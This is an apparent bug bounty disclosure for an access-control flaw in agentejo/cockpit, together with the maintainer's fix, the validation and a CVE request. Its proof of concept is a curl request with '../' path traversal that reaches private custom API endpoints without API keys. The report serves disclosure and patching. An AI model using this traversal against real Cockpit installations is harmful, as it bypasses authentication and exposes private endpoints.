Improper Access Control in agentejo/cockpit

Valid

Reported on

Sep 9th 2021


✍️ Description

A local file inclusion vulnerability allows attackers to bypass the need for API Keys when querying private custom API endpoints

🕵️‍♂️ Proof of Concept

  1. On the server create a custom API endpoint in /var/www/html/config/api/custom.php as follows:
<?php

// very simple code here

$test = $this->param('test');

if (!$test) {
return false;
}

return $test;
  1. Then execute the following command, replacing IP:Port with your server:
curl --path-as-is http://10.0.2.15:8080/api/public/../custom?test=win

You should see 'win' echo back, which proves we can access custom.php in the api directory without API tokens.

💥 Impact

Attackers do not require API tokens to access private custom API endpoints

Recommended Fix

For the 'path' parameter in the following file https://github.com/agentejo/cockpit/blob/568b0124352f6d27df359e8c19a70d2dd1961e87/modules/Cockpit/rest-api.php#L117L123, use a regex statement to only allow alphanumeric characters as well as / and _

📍 Location rest-api.php#L117L123

We have contacted a member of the agentejo/cockpit team and are waiting to hear back 3 months ago
haxatron modified their report
3 months ago
haxatron modified their report
3 months ago
haxatron modified their report
3 months ago
haxatron modified their report
3 months ago
haxatron modified their report
3 months ago
agentejo/cockpit maintainer
3 months ago

Maintainer


should be fixed with this commit: https://github.com/agentejo/cockpit/commit/f1919184998bf9fa7a7db882c98ce1410375e596

haxatron
3 months ago

Researcher


Hi there! Thanks! Could you validate the report?

Artur validated this vulnerability 3 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Artur confirmed that a fix has been merged on f19191 3 months ago
Artur has been awarded the fix bounty
Jamie Slome
2 months ago

Admin


@maintainer - the researcher has requested a CVE. Are you also happy for a CVE to be assigned here?